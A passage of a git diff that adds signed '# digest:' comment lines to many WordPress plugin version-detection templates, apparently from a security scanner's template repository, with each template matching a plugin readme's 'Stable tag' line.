4a0a0047304502205f825d2337e150b91dbf835953e252d7e983628a163bc178532df272bac4cfa2022100e8a67980ed306f1eeffa5dbf23b02192fd8d944b79aca39f19e68688dbb96fde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..a5df60b082 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207e6f611c905baab9d5c3bdece3a3766a842170d0ecddacd43cb133b28b06778c02210092117231b8b6251efc9aa3fb39ded668660293bfba7b3b55604d17f2107889bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..5261d975b2 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e33a30d5d713df387a3638a15078bf5977719cab06cfbd804ad0347b301a0edd022100da54f7e3e4945e0212a6ee3d8231d8dde9a12dca36f890f2331a4cc14ba0b3f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..10e7c3f77d 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009909b80636245767dee363602aaf7fe231a627372a7b259266e7dc5ffe274703022075eae008976fb86ae2a8253f854ca4b0d7e623f4cd9cf9971bf518d418320a14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..e98c0e7dbf 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100834724bbf0c3d2011f2507eba2afb31375cad5d652b429ff1687125ce516a84f0221008b64f9144b48e97099179323be29b92723aed4cff2fa0a04a40a50ea2a89a30c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..ab73175154 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e19d629ad95f4eac4db2e5512cd2ba73389b27a9f9766466a63e9828770d481e02206e99e4334555340bbc13ba46db89ae915a8d9fe689d67aa2630b31bed98ff60f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..ef0a5c9cc4 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210090ac5bf006c13b6bb67e013c776b2190b203604432a32de7899a660d190b001f02204c3110a23d345316495ab05ee3b07303305dae140c8ca1cc0015957c7bfb247d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..4adc97c884 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b1153a764995dac4233040edf6cfc407287415addb3c7ffa8ba983caf2a363bb02204d48f3d2283de014bec29897e6fed71201ba4320958ee52dd6789e71f727d8fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..a75b113362 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022053d4e9d9cfac796df23ba2042cf0dfb5dd167bfc6f6423ad6c8c0e071f6f18170221008a790bb45e907e94a949f6cc2241091388e8aa9c70338ce7ddeb6433f32d0566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..0cf6da7545 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100878c3a6cb2f29d4535ea6f78bd4b9582e01cabb3002317b13c9147cceb2728c302207c58fe19769ec05937e8c3e17ea435e176b714a1369d15bd6629927c5a5f73c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..ddc9689ef6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202c22acfa80dfb52ebedacfe5b82fa56b77d0719b5b69a23a077ee4a23630436402201ed7b93a181a13d37a2af57dc99e6ed76ead27e1fc12ad8d1494580528dbd342:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..a5bf00f60a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022025dfcf650f934b4a26f9e0f19b716eeab7c5b15d84cecbabde257033a9e990da0220372b432eb46f34ca1abb462c80c6aa8f531cdd191e99ea37541a2ebb3a0d683c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..62508df573 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009183dc31a3baac866d1b3dc683df6c15c0d35d2391a1fba95cc4d83d7a1131d702210085cf5ed7aec736f9c6c4cf2d24f8329135fb60b7c8d3a4183d047405ca318da7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..8c87bbf565 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009df2cdd037d6bf14f02f47933ece136f508a262cc3309772730f3c83f9c8ac87022100a7b8e8ac540d86c34d478ee3eab7901be202f499a3c5656a56d3fc9004b83399:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..3bc62ce326 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022028f9a1aa4a92cb9b9452cb4c9bd0218eac8ef23bc817068470d3c6cb77f40b6d022100dcd3bb6a42f784793bf066e3cf4ace3adc5777801e8a1bf99cd55b7b68749ec7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..536fe13411 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022073759daaefca38354050098f404bd14bc7f58bafe8b49f0390ca268c5df7047702200c637ca7b3a4b361cc323c7fabfa9ec73d647954167eae899d6732b157d79743:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..21bd2f4c51 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085d0c0f357f742c85260b85d24af882b99a58442a61ebe03d1ffcae5867a7d72022100bc64e28e7eb3a0b63affb71beeceae53bffc63e445c0f6137395d648b9f961cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..e4ad09a1de 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201925756022f3e7fe15fe5e37e27aa0413bc159321c13ec670124fffd749735f202210098d9807a92a11e3e1df078163a88531fd2f4e2f709642c8a621bccda00a70e40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..4062591665 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022042deff8879164e191fc2e2164e1980b9aed0a9537da6665db819b342b6a7bf8802200e7de8820499b34eb056c9787170f2c9806a46d22b1773652bad43628ed684d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..d0b76ce08a 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ca8b7e98aef9c3d3bd8dd529979e30790bee2cbaca2778f537700a6e57836cb9022100a4302b7a3fb80f42473d71c33a4ce590d60f96aedbae123fcce5e49fe43c1c4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..39da3030f1 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bdc2f54d2b16295dd8d412ba1e41d87f6c1d9e53768d4b51f0cc2b978edbe0f0022100ec9ca687e0f670e0c7ad0bf5165094546cceed4358891c826854a045f324f31b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..4950872a65 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022100ec3f46347261a54bdd0b37411c813643975cdafb4d74ea2dd537dbd962b55c59021f5260b4673219a30051c0add154f77f5542e7f921e9b23ecfa5c003e9331fe7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..c51022fc8a 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ffa6dc968122efdd768e0a6441571922e7b0e10f87d6dc063fbb5ec6fabd1621022100937d81af566cf7114797ff6beefd6c52024686cb5a7ec9dd283833e87c3c4b0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..fcf054ca62 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008bfc2ce547f6c9a04fa02d0237b4482fe3ecc17e0b23f0b1712aa24b30f1e4d0022067b74a75a0a3271b18e6c0eee0d6852e061013a21f1ab86df00bab2f529b2877:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..3829b19e11 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cf23056389d7bcba55758cae2f6d009662a54dc7a6816dabad3ec0e6514cc633022100b47f6926b3a5b5ff78c373883c9d6f20f93dc8ab07cd170138bc39e2687af814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..e7fb2c9aed 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ca5b8a2e6fcc0ce48a03935bbdcc38b9d974ddb254e65ea960d7274e133b768702210090177f26273e0d70c8e500993023d0770ce286204fc1260cd18acad5dddfe0a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..566d9d66d3 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dc3ad2ce99b4d1897dc35d0fe1453d72d9146dfcb467bf84af1be825e7d5dcc402200fbff4cfd07f464657604191ba7a002c36d8c24dd391201dff4378c8a9b4058b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..8f8b90e338 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200111667a9c0dd141d107758d95799c581a1164f6e282c12ac723334a6f4b158d022100fdb18e3bafefd84e2471b43c9e76396503b85e0ec5094609d45e457b57a096b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..96ca69443f 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b936006d37eb97b293cb403d0d14095beb98d8739e30b590ad4e75ff1f676832022100cc002c0dc443ef5b86bf04a46346e12ed0c155165f6994ed8af016c6ce0559aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..d8a6e8be9c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a6a0cf17ea9836c53f4ee9a0a9fb73bda620a77f86fd955e3860fc64444374090221009d1e4ec90385a85f82ad6488e7fdc33c9eed8515c80ff6db3e4ff1f2c8204b5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..11c4989221 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210099a2fb30d6f2c3c7d295964cf8eb01da385ba1635a15b8f358eae222a146a87802201f39537fe7dfc25eb25b494b2ec970e18131988dee90d4d4fc2731c919a8522c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..24cd85e187 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022024e4cf41330ba6aa1506a16856bac78905ebf1d9e47d2019193ddac3e703b75a0220177cf6ad47c427325e80396d5bb739df78a821124b7f24e1bf2bf47328ed3dcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..f2fdf187f7 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205e3413f1ad0393bbebb79e8c4a3ebab8976f85637c108efd271553cea3d44609022100ce6a633288dce3c5859bd5037b1f394e1efe318834b855155c54e6f2666378ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..567167e75c 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 480a00453043021f4a67da57e575c473a3362ecae4e74dcc0acdf2f4e4207540badc3a1ba08cf5022062a866e2a74409e264f2b4d10ed09135f9c199379a63ae7bcc12fafabcf8dd24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..58c47077a3 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100980f7f675e69ff9df7afadd20cbfb804636a4f8559ca690c873dd106b9c4c9a8022100e6b20b71f6e7cba4825d66b818a959847e0c35ad5ea490debad4455ecb5b1090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..1a51983533 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bcd7d4e128968717a71f00f049c283f79179e1e14f0215fe7a7ff6ca32e58230022100e23be9bd3d0605703cce1d42c2351ad72bd31f3a97b04c3fd9842c59b3f5737a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..7974257255 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210099df16426e8a6ac03b18149506bd293a58d5a79311a2c6e6cf8c2b87faa48cbc02201362a29c6983d9300940ade71d2fa8366ec5135e7fe383529351852849c7e071:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..81b2f20d27 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c846ee451ef63386e1431dc46ee36b313bb29d404df7ba7b3f7b89ca3b42257e022048919c3189e0c182bf4c190e9829dd8f92e392ed5e7d3ab220a1b15fee818ef0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..a2660daa39 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205f0ca515c9640e342359ea3ab01f4c55b8c72452988a4fb9eebd380b15ba4cae022100f22b43bd52c6c075f5d57fb74e54681c243f37d7eddaf1ee90d66833ba2184e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..29d724422d 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201946f3bc2c0e34616e0b60553ef0a482933d22969b6280b6bc47565abc3603ca0220131faa3891ddacd9305154ff33f198e0eae8b71c219089a948401120e58b4b2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..70ec4564e0 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008e6cc350681113b7199d3b37cde6d4fd3ebac9c36f553dcc8963cd43254cae52022100fb16d2183f75275ce013c2123127b3ef1acafb9b24c67ecd698bf75ebe227d51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..61664c50ae 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c6c287444167a4f127205bf92030a6420544f8b77758bda980155b834ac985870221008972a484f6538c4f548e2ee726558b81936c975a7eaca4d441a7c92a0e9c00bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..4ea202938d 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e0ebce1fe622b3d0cc478d3dba1ecd9236292d841e71e426fdadc7b824a73349022019ef42eca1a0953f72bc8e770988a9ef89510441af0a947b07a0d78ba4d12cbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index c1a44066bb..1e396e565d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a16055b0044d04e2a40783ba095a79bb0de98708e7e5dc52a27abc53784d2bf7022100baf0c71b000d9c14a06ea90f5080e10c7c9a7e362f6d11e18977b120a8a4b0dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..317f88524a 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201cf417d83d3992f57c51cbc5f191a33c2eabc8b3bcd5690ed592320d8591afd302207976ee372387e5f173371d2eeb7e5db7632ffa65a8d4f892e8144ec2bbcc495d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..29f1106364 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008a683a47602cc3c37262fe1be74fc64c8548c90e030662b164c7cc2cb8be464f022100d5222b76ff1c01e4dc0df6b548dfb1c9808e3832cd826a8d4bce066515620e76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..6bc0cd435a 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c33ef075ccee2fb533dbe39730ebe8e44594696700881cd359742cd2f3723e1002206ba4f22c5a2535f19737efec6cc00342b1aa148f50053b270007bf78d5460592:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..69b67310df 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 